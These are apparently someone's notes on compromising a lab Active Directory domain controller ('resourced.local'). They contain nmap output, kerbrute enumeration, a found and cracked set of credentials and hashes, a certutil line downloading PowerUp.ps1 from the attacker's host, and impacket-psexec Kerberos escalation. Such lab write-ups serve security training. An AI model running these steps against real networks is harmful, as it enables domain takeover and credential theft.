Date
Mar 27, 2025 → Mar 27, 2025
Tag
Nmap
User Enumeration
Network Scanning
192.168.125.175
Nmap
└─# nmap -sT -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-27 02:23 EDT
Nmap scan report for 192.168.125.175
Host is up (0.051s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
9389/tcp open adws
49666/tcp open unknown
49668/tcp open unknown
49674/tcp open unknown
49675/tcp open unknown
49693/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 26.54 seconds
└─# nmap -sU -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-27 02:23 EDT
Nmap scan report for 192.168.125.175
Host is up (0.053s latency).
Not shown: 65532 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
Nmap done: 1 IP address (1 host up) scanned in 27.70 seconds
└─# nmap -Pn -n $ip -sC -sV -p- --open -oN nmap.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-27 02:24 EDT
Nmap scan report for 192.168.125.175
Host is up (0.050s latency).
Not shown: 65515 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-27 06:28:35Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: resourced.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: resourced.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-03-27T06:30:03+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=ResourceDC.resourced.local
| Not valid before: 2025-03-26T06:20:22
|Not valid after: 2025-09-25T06:20:22
| rdp-ntlm-info:
| Target_Name: resourced
| NetBIOS_Domain_Name: resourced
| NetBIOS_Computer_Name: RESOURCEDC
| DNS_Domain_Name: resourced.local
| DNS_Computer_Name: ResourceDC.resourced.local
| DNS_Tree_Name: resourced.local
| Product_Version: 10.0.17763
| System_Time: 2025-03-27T06:29:23+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49708/tcp open msrpc Microsoft Windows RPC
Service Info: Host: RESOURCEDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-03-27T06:29:28
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 318.97 seconds
139,445
V.Ventz:HotelCalifornia194!We can found this password from above, try to use this
5985
nothing found
Domain Enumeration
Domain: resourced.local
Have try this in Ldapseach but the credentials was wrong
let found out if the password is belongs to others one
../kerbrute_linux_amd64 userenum -d resourced.local --dc $ip users
I am certain this password does not work for any user
but this password actually works for SMB login
so we have ntds.dit and ntds.jfm so we can crack the password of them
we cut the hash part out
Administrator : ItachiUchiha888
resourced.local\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808
we can use this password login to windows via evil-winrm
PE
certutil.exe -urlcache -f http://192.168.45.160:8000/PowerUp.ps1could not run powerup
Here have a SID end of 519 which means it is a enterprise admi
this privilage allow us edit and write some new properties to new machines.
export KRB5CCNAME=./Administrator@[email protected]
Make sure the hosts file are correct
sudo impacket-psexec -k -no-pass resourcedc.resourced.local -dc-ip 192.168.125.175
